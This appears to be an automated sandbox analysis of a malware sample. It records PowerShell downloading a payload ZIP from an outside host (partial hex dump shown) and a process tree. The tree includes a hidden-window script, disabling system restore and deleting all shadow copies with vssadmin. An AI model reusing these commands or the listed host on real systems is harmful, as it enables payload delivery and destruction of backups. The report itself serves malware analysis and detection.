                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.541598082 CET1.1.1.1192.168.2.60xe7a2No error (0)usjjsjsj.com.ng142.132.252.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:46.102710962 CET1.1.1.1192.168.2.60xe95cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:46.102710962 CET1.1.1.1192.168.2.60xe95cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:46.102710962 CET1.1.1.1192.168.2.60xe95cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.649721142.132.252.484433136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-01 09:37:29 UTC179OUTGET /execute/payload.zip HTTP/1.1
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                              Host: usjjsjsj.com.ng
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-12-01 09:37:29 UTC397INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              content-type: application/zip
                                                                                                                                                                                                                                              last-modified: Fri, 01 Nov 2024 03:04:08 GMT
                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                              content-length: 36368223
                                                                                                                                                                                                                                              date: Sun, 01 Dec 2024 09:37:29 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                              2024-12-01 09:37:29 UTC16384INData Raw: 50 4b 03 04 14 00 00 00 08 00 05 1c 59 59 d9 bb 21 00 7f 5f 00 01 fa 1a 04 01 1b 00 00 00 70 61 79 6c 6f 61 64 2f 43 68 72 6f 6d 65 43 6f 6d 62 6f 50 61 63 6b 2e 65 78 65 ec bd 79 78 14 55 16 37 5c dd 9d 86 40 12 aa 59 1a a2 28 34 d2 6a b0 5d 1a 83 1a 08 48 17 e9 86 6a e9 40 90 55 65 d3 68 06 37 64 48 37 8b 06 48 e8 04 e8 29 5a 71 c0 7d 1d 45 c7 6d 66 70 d4 10 36 cd 02 59 58 42 00 51 16 95 80 5b b5 2d 10 18 21 01 84 fa ce 39 b7 aa ba 13 60 c6 f7 7b de 7f be e7 f9 78 8c 55 75 ef ef de 7b ee b9 e7 9e 7b ce dd 3a fb de 15 9c 89 e3 b8 04 f8 53 14 8e 2b e3 d8 3f 17 f7 07 fe 19 38 ae 53 ef f5 9d b8 4f 3b ec e8 53 66 f0 ed e8 33 6e c6 c3 f9 b6 59 b3 9f f8 d3 ec fb 1f b7 e5 de 3f 73 e6 13 7e db 03 0f d9 66 07 66 da 1e 9e 69 73 8f 1e 6b 7b fc 89 07 1f ba 39 25 a5
                                                                                                                                                                                                                                              Data Ascii: PKYY!_payload/ChromeComboPack.exeyxU7\@Y(4j]Hj@Ueh7dH7H)Zq}Emfp6YXBQ[-!9`{xUu{{:S+?8SO;Sf3nY?s~ffisk{9%
                                                                                                                                                                                                                                              2024-12-01 09:37:29 UTC16384INData Raw: f4 be 40 ee a2 04 63 c7 a8 91 d4 33 40 5f c1 4b d1 05 cc ab c0 82 fe 3c 60 e5 13 af a0 e7 1b 75 e1 08 82 62 c5 7e a9 92 4c d7 86 74 6a b0 c3 eb 71 dc 66 84 7e f8 35 a8 41 0e bf 6b 5c 90 0d 12 8c 0e 7b 48 4c 8c b7 0e 6f 1a d0 ca 3a b4 e8 77 ea c4 fa 1f e3 f7 e6 bb 74 7e 67 a8 fc fe f3 5d ad f9 5d c7 64 a4 1b f1 bb d3 fa f6 54 26 b0 7c 97 af 35 cb 5b fd fb 9f bf d7 74 6e 99 f2 5f 7e af 49 f6 ef c1 9a 5f fa b7 9a f0 5f fc 7a e2 19 ed 3e 33 a5 2a 2f 38 f8 1e 9c d3 0c 67 5d c0 df 15 9b 9b c5 af ed b0 1e 8f 3d cb db ba d0 2f de dd 9a 17 5c 64 1c 14 70 88 c1 73 c6 39 d6 f4 72 f8 4c 98 cc af 2a 8f d3 54 ea 7e b8 b8 99 a5 4b cc 52 d3 7d 39 2b d0 4d 96 cc 39 f3 74 81 02 87 1d 5c 10 6a 46 dc 2f 05 4d ca 5a 33 44 b7 2e cd f5 1a c9 f0 c1 dd aa 30 ba bf 27 82 b6 45 d3
                                                                                                                                                                                                                                              Data Ascii: @c3@_K<`ub~Ltjqf~5Ak\{HLo:wt~g]]dT&|5[tn_~I__z>3*/8g]=/\dps9rL*T~KR}9+M9t\jF/MZ3D.0'E
                                                                                                                                                                                                                                              2024-12-01 09:37:29 UTC16384INData Raw: ed 78 04 06 59 d8 2f 76 e0 4a d1 0a 0b a4 8f 0c 44 c7 0f b8 9a 9d a8 7e b6 1d 87 ae 38 93 a6 ee 6a e0 38 66 35 e3 8c 39 4d a1 8f a5 7e 5d ad 92 07 49 bb 7c 30 50 43 fe 62 e0 2a ca 6d b8 4e 94 ed 4b 11 95 05 56 80 ad 61 8a cd 80 be 3c ee b1 b2 eb 02 5f 87 d9 20 bd 16 0e b5 95 78 2d ed d5 4f 70 1f e1 63 74 49 c2 0e c5 e9 7b 5e c6 ed 3d f6 bf 38 92 36 dd 60 7e 9e a8 cc 0f 72 ca 84 eb 66 81 5c 69 70 b7 c0 bf 0a ff 6d f0 df c9 f9 6c bc cd 32 0b 24 0e 44 1a 60 5e ef 3e 82 8b 84 ea ef 40 5d a8 78 4a 35 92 4e 5f 92 48 bc 41 e5 3f 37 42 e6 0b 15 4f b5 71 32 4f e6 9c 12 03 de a0 8a 06 87 fe d9 f6 8a a7 3a 69 e4 df 69 64 1a 8d cc a0 28 82 ac 7d 15 45 92 79 73 ea af 08 d7 4f 67 5e 09 ae 77 53 2e 86 eb d9 0b df 03 ae 9f 75 5f 06 ae a7 ba af 04 17 b3 e5 f2 a5 aa dd 0b
                                                                                                                                                                                                                                              Data Ascii: xY/vJD~8j8f59M~]I|0PCb*mNKVa<_ x-OpctI{^=86`~rf\ipml2$D`^>@]xJ5N_HA?7BOq2O:iid(}EysOg^wS.u_
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: 77 ec 73 b8 6b 3d fc 29 c0 d9 93 87 95 9d fc 48 80 ca f3 d4 b2 df c0 24 8f bd 0a 43 6b 7b 0a e1 79 8e 16 62 c4 3d a7 8c 3e f0 1f cf 65 7f f0 63 c2 bf 88 38 33 a1 2c dc 89 e9 ec 5b a1 b4 57 3a fb 2a d4 e6 38 55 39 83 8b d1 3a ef c9 0b 2e ce 01 6c f8 0e 4b 21 0f f3 aa 1e 06 65 56 da f3 50 e7 7f 0a d7 00 b6 a7 13 08 23 9b d4 f6 90 e7 70 c8 f3 29 5b df 8d e4 65 15 14 4f 8e e8 f1 e4 21 f1 26 f3 da de eb 12 3a 3a 7f 01 c4 80 38 5c 0f 48 9c 0d 48 f4 cf 50 1c f9 ab 2d c1 12 ab 80 27 27 a4 50 61 a5 f6 f0 b5 c8 7b b6 5c 8d ea e5 1e 37 c2 fd be d2 c0 16 df 06 12 6b a7 3f bd 3d 38 33 cb 8a 3b e3 83 94 a9 e8 d1 8a a7 1b cd ed c1 92 ac 33 e7 59 ad ce 33 8f 00 9c e0 a4 21 8d e7 9b 4a b3 d6 25 b3 fe ca 83 81 fe c0 26 77 a0 58 d4 19 bb 1a 50 12 66 d9 30 75 d1 fb 0b 9d 28
                                                                                                                                                                                                                                              Data Ascii: wsk=)H$Ck{yb=>ec83,[W:*8U9:.lK!eVP#p)[eO!&::8\HHP-''Pa{\7k?=83;3Y3!J%&wXPf0u(
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: b5 c8 a1 7b ad 72 68 79 b6 1c 5a cd f7 e8 e6 48 ba 5f 1c e6 f1 7b 8d 3b 68 e2 49 ce 7e 5c 6d 91 43 53 5b 7c a1 99 0d 3e 75 26 53 e7 1b 98 ed 2e 5c 8a ff 41 f3 d8 ad 7a 0c 1e 1e 7d be 20 b8 26 d7 39 d6 ad b4 e8 93 08 d4 4e 0c c9 88 9e 76 85 8d 6e dc 60 a8 3c 2a 3e 1f 91 f2 5b e5 fc 56 29 d8 8d de d4 ef cb a6 46 c9 d4 4c 66 31 66 be 9d a6 99 b9 2e 4d 88 5d e3 86 e9 b4 1e 5b 41 33 25 85 98 77 2b 3b ea 40 74 17 48 9d a5 93 88 cd d0 d3 2f 05 9a ba 39 6c 38 75 d9 67 aa 92 39 ae db 6b fb 1a 7b c2 f2 54 18 96 4b 98 a7 32 ec a9 8e 7a 71 e0 5d e2 ec 1d c1 70 3f e9 97 c0 b2 57 f8 90 13 21 4e e8 d8 af 1c 9a 79 18 06 2c 07 4b da 04 b2 1b f5 70 a2 a2 fa f8 41 b9 39 e7 46 b2 d7 8d 55 b5 65 6f 13 a6 05 8a 1b ec bf a2 70 6f 70 f2 58 71 43 8d 64 da ef c1 5d 24 19 83 2a 6a
                                                                                                                                                                                                                                              Data Ascii: {rhyZH_{;hI~\mCS[|>u&S.\Az} &9Nvn`<*>[V)FLf1f.M][A3%w+;@tH/9l8ug9k{TK2zq]p?W!Ny,KpA9FUeopopXqCd]$*j
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: b0 62 06 46 54 c8 ea 50 66 c2 ce b8 1c 05 ec 4d 97 e3 4c 61 af 03 19 4d 28 40 68 78 49 ab 63 1d c2 86 c7 1f fd f9 03 66 83 b0 e1 9d 47 17 3f 60 26 3b bb 11 d4 b8 b2 a5 1f 1a d8 f1 86 08 56 60 07 2b 5f cc c3 0e 4c 39 ff a7 f3 9a 14 fe ca 24 6c 2c df bc 08 3e 92 e4 27 0b 8b f0 42 71 71 b7 d5 bc 13 e4 80 47 95 41 b7 23 bf 96 f1 5b 97 bd 61 c5 5c 46 24 0b 2a 9d cd 95 f3 45 14 97 c0 45 3c c8 3b 1e 29 18 8f cd ea 04 ee 61 28 41 e7 b3 c7 89 74 a0 85 40 90 d9 21 99 eb 3c 2c 9c 1f e4 81 28 51 b8 cc 0d 2e fb 2e ff fe e8 1b 48 cd f6 e3 c2 da 59 d8 32 2f e3 7b 2f 0b 23 65 ba d8 31 67 50 d6 a9 d2 e7 d8 d4 83 22 43 2b fa c5 a8 71 e9 6c 98 07 87 79 18 1a 1c 6b 73 21 c0 64 8e b7 fa de 79 f1 56 c7 41 88 20 df a2 fd 88 ef 61 3c 0f bb 9c 4a bb f7 7f 53 5a 64 0f b9 01 62 02
                                                                                                                                                                                                                                              Data Ascii: bFTPfMLaM(@hxIcfG?`&;V`+_L9$l,>'BqqGA#[a\F$*EE<;)a(At@!<,(Q..HY2/{/#e1gP"C+qlyks!dyVA a<JSZdb
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: 1c 71 51 48 11 b2 ed 6c e5 ec 90 d9 32 91 b4 8f b6 42 9a e9 84 82 94 20 be 74 76 6c 88 24 26 32 94 1d 13 19 17 0d 44 21 66 d2 7f 2d b7 2c 38 21 5c 24 d3 16 5b 8c 90 df e5 a3 29 69 a8 44 12 1d 29 62 c7 4b a4 91 32 68 3d df c9 09 d7 24 19 09 c2 c6 4a e4 31 61 ec 38 89 ac b9 64 b1 a2 58 09 34 0f b1 24 41 2b 70 a9 2c 41 1e 0a 0d 8f 94 7a 28 d5 1f 6c a5 c4 8f d2 53 42 41 e9 7d 27 8c a5 f2 6f 8e 87 f3 17 cb 63 62 74 42 09 82 97 90 00 f1 a1 b1 a3 42 3a 36 77 12 7d 3d 1a d1 c6 c8 d0 80 61 62 4c 67 9a 9b 99 4e f7 f6 17 38 d8 86 0d b7 95 ce 60 a3 f0 e9 84 37 e1 4f 08 08 07 c2 96 08 23 86 c3 33 86 90 12 33 08 36 95 5e 13 9f e7 e3 33 c1 07 92 20 e9 da 4a 4d be 4b c7 23 7c e0 7f 02 fc c8 b4 24 9d e1 5a 3a 23 08 77 42 42 24 10 b1 44 30 21 23 3c 09 11 84 4a c1 1d 0e ae
                                                                                                                                                                                                                                              Data Ascii: qQHl2B tvl$&2D!f-,8!\$[)iD)bK2h=$J1a8dX4$A+p,Az(lSBA}'ocbtBB:6w}=abLgN8`7O#336^3 JMK#|$Z:#wBB$D0!#<J
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: e3 70 07 2c 8e 58 9c b1 b4 25 e9 70 22 2f 9c 81 2d 3e 4f c7 32 02 8b 20 39 96 d2 7e d3 0e ea 2f 48 8e 66 71 d2 a9 ed 90 80 dc 3a c8 63 19 6f 24 20 4a 83 a4 44 69 9a 5a 12 c3 8f 4b 12 2a 45 54 98 40 45 69 6e a9 8d 97 4c c6 9f 28 c6 a6 d4 1c c9 95 ed 18 7f 6a f8 e8 ee 22 1b 7e 56 0c 81 88 56 63 48 d4 4c 33 01 fc 18 a9 5c 95 a4 a4 ea 26 20 73 43 f8 1f d2 43 fe da c9 a9 5b 07 88 50 5b fe 6f 83 35 e1 74 f5 ff 29 17 12 4f a2 54 27 e1 9e c0 37 1e 94 7e 44 4a 3f 53 a2 50 c1 b4 53 1c cf ff 43 55 d8 f1 7e 5b 25 ad f0 ff 58 25 01 a5 56 f7 1f 3a 8d 94 93 24 52 83 d1 0e 6a 98 04 bd 03 90 20 2c 22 22 90 a9 07 3d ae 9a 59 a1 cb 7f 9f 31 99 ff cc bc 86 f9 cf 50 24 90 27 ca 24 7c 32 87 54 12 32 2b 04 b5 9d 44 c7 64 d7 8f 1d 3e 74 b8 4e 0c 01 be 29 15 c6 e1 7b 84 3f 8d 2f
                                                                                                                                                                                                                                              Data Ascii: p,X%p"/->O2 9~/Hfq:co$ JDiZK*ET@EinL(j"~VVcHL3\& sCC[P[o5t)OT'7~DJ?SPSCU~[%X%V:$Rj ,""=Y1P$'$|2T2+Dd>tN){?/
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: 23 29 81 2d 1e 5d be 74 10 65 c9 32 25 06 89 e6 a3 f0 6a 7e cf f3 f2 45 da fb c5 8a 70 51 d5 fc 44 b8 51 f0 8b 0a 84 df 34 51 ee 2d 37 1c f8 3b 2c c2 1d c4 7f e6 d9 e6 a6 03 7f 6f 42 1d 27 21 cc 2f 05 7e be 55 7e 1d 98 5f 2e fc ec c6 13 ff a9 7a ee 6d 07 3a ec 62 f3 53 5f 2f d1 c2 de c0 4f 64 c9 6d 4f 14 a9 6e 34 0b b3 09 2d aa dc e2 87 43 1e 5a d2 f5 83 5f 82 fa 87 4c e3 b4 54 c9 ca 6d 54 13 f9 2f 3a 24 2f 47 f2 4a a8 65 f4 88 73 8f 72 33 10 f9 05 39 93 57 6c 3d f2 0a f5 21 2f c9 8b dc 8c 62 1e 2f 40 d8 26 3a 8c 8b a4 ba 64 f0 23 7a 0b 92 82 b6 c4 34 ae e6 96 9c b0 66 87 68 0c 52 2d 27 aa 15 ea 41 b5 a2 5d 2d 3a b3 53 54 13 2f 27 f2 3a ea 4e 1e 26 37 72 4c 72 a5 28 6f d4 a5 2e d6 01 35 8d ea 6e 27 22 84 25 84 a5 1a 61 25 67 07 72 4e 70 30 6a 50 d6 26 8e
                                                                                                                                                                                                                                              Data Ascii: #)-]te2%j~EpQDQ4Q-7;,oB'!/~U~_.zm:bS_/OdmOn4-CZ_LTmT/:$/GJesr39Wl=!/b/@&:d#z4fhR-'A]-:ST/':N&7rLr(o.5n'"%a%grNp0jP&
                                                                                                                                                                                                                                              2024-12-01 09:37:30 UTC16384INData Raw: 11 65 cb c0 d9 fe fa ab 07 1b 65 73 ec 07 e3 f4 36 3f 6c b1 9f 03 18 01 ad 8f e4 15 e6 f6 57 51 92 72 72 d7 03 e8 4f 7c 68 3f 45 23 84 77 8d 25 f9 8c 50 d6 f9 5b 89 0e c6 6f 91 54 cb 55 a5 0c 8c 9d f1 e8 9a 9b 9b 1f ec 2b 33 ea 4e 7a f6 8d ef ff 1c f9 e9 3e e1 b5 d1 f5 92 0c 93 e6 c6 2f b7 ab 70 d3 04 e5 3c 98 73 0c fd ee f5 1d 03 d3 65 2c 32 fd f6 3b 28 04 f7 e3 fd cd e6 de a7 2b 0e 98 16 d2 8e dd eb a8 ea 37 fd 25 98 1c da e1 1c ac 28 db f1 d0 6d 83 b2 42 7f d5 3c 4c 5e 91 3d 50 8e 44 18 a6 bc 2d 1d 1d 53 a5 c7 4d 84 af 9f 2e b7 60 4a 2e 9f 97 6e ba 3d 46 a0 a2 e1 25 8a e9 9d 61 5a f4 be b2 e3 0b fd 7b 4b f4 ce aa 31 de a8 25 ce 64 d7 18 cb 6b c9 fc 51 96 14 b0 e7 a1 61 a7 27 5c 21 1d 01 51 ca a8 e0 d5 f3 c8 1b e5 f0 98 82 ee a8 5f 03 d2 86 b2 d1 ee d9
                                                                                                                                                                                                                                              Data Ascii: ees6?lWQrrO|h?E#w%P[oTU+3Nz>/p<se,2;(+7%(mB<L^=PD-SM.`J.n=F%aZ{K1%dkQa'\!Q_


                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:04:37:20
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:04:37:20
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:04:38:28
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff7e5300000
                                                                                                                                                                                                                                              File size:18'960'364 bytes
                                                                                                                                                                                                                                              MD5 hash:FAECB8128727E4D7B36E49B3161A2C9E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:04:38:30
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff7e5300000
                                                                                                                                                                                                                                              File size:18'960'364 bytes
                                                                                                                                                                                                                                              MD5 hash:FAECB8128727E4D7B36E49B3161A2C9E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                              Start time:04:38:39
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:04:38:39
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:04:38:40
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
                                                                                                                                                                                                                                              Imagebase:0x7ff7e5300000
                                                                                                                                                                                                                                              File size:18'960'364 bytes
                                                                                                                                                                                                                                              MD5 hash:FAECB8128727E4D7B36E49B3161A2C9E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:04:38:48
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command "Disable-ComputerRestore -Drive C:\\"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:04:38:48
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:04:38:51
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell -Command "Enable-ComputerRestore -Drive C:\\"
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:04:38:51
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:04:38:55
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\vssadmin.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:vssadmin delete shadows /for=C: /all /quiet
                                                                                                                                                                                                                                              Imagebase:0x7ff6422b0000
                                                                                                                                                                                                                                              File size:145'920 bytes
                                                                                                                                                                                                                                              MD5 hash:B58073DB8892B67A672906C9358020EC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:04:38:55
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:04:38:57
                                                                                                                                                                                                                                              Start date:01/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff7e5300000
                                                                                                                                                                                                                                              File size:18'960'364 bytes
                                                                                                                                                                                                                                              MD5 hash:FAECB8128727E4D7B36E49B3161A2C9E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:04:39:07
                                                                                                                                                                                                                                              Start date:01/12/2024
